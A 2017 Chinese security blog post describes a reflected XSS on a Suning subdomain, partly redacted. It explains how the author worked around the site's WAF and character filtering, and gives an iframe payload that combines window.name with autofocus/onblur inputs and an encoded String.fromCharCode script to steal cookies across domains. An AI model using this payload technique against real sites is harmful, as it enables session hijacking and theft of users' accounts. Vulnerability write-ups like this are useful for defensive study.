A-A+

苏宁某分站绕WAF+变态过滤利用域终实现拿cookie

2017年06月15日 16:22 漏洞安全 暂无评论 阅读 86 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

话说,某日发现苏宁某分站有一个参数可以随意输入,但是可能是因为代码的原因导致部分标点符号会改写代码。首先就是苏宁的网站有自带的WAF,这应该算是第一层WAF,是苏宁所有站点都有的WAF,这个上文已经将了绕过方法。咱们在绕过此WAF的前提下(本来绕WAF就限制了很多,绕WAF的情况下还需要被过滤一些参数。。。哎),才可以进行下一步。

首先是这样一个地址:http://xxxx.suning.com/getxxxx.do?Codes=00aabb-00112233

访问一下如下图:

访问url回显内容

相信应该看得很明确了,这时,只要把上面的112233的那个地方放入JS代码是不是就可以了呢?

结果就像上面我说的,因为他们系统代码的原因,导致逗号、双引号、反斜杠只要有这些,返回内容就会出现问题,导致XSS代码变乱码。

最后经过各种测试发现,如果想实际获得cookie,只有利用跨域。否则真的没有发现特别好的办法。

首先本地新建一个html文件。然后放入如下代码:

1
<iframe src="http://xxxx.suning.com/getxxxx.do?Codes=00aabb-00112233&lt;input+onblur='location=window.name'+autofocus&gt;&lt;input+autofocus&gt;" name="javascript:document.write(String.fromCharCode(60,115,67,82,105,xxxxxxxxxxxxxxxx,84,62))" width="300" height="150"></iframe>

然后把这个html文件上传至空间,只要访问这个文件,就会跨域获取苏宁网站的cookie。
最终如图:

跨域获取反射XSS cookie

 

只有以诚相待,才会不虚此行。
标签:

给我留言